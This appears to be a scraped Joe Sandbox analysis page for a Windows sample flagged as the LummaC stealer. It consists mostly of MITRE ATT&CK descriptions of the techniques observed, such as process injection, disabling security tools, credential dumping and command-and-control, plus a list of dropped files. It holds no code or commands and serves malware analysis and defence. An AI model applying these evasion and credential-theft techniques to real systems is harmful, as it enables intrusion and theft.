Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report es5qBEFupj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Symposium.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\es5qBEFupj.exe.log

C:\Users\user\AppData\Local\Temp\768400\Climb.com

C:\Users\user\AppData\Local\Temp\768400\V

C:\Users\user\AppData\Local\Temp\Alt

C:\Users\user\AppData\Local\Temp\Articles

C:\Users\user\AppData\Local\Temp\Attractions

C:\Users\user\AppData\Local\Temp\Beaches

C:\Users\user\AppData\Local\Temp\Cooked

C:\Users\user\AppData\Local\Temp\Enrolled

Windows Analysis Report
es5qBEFupj.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre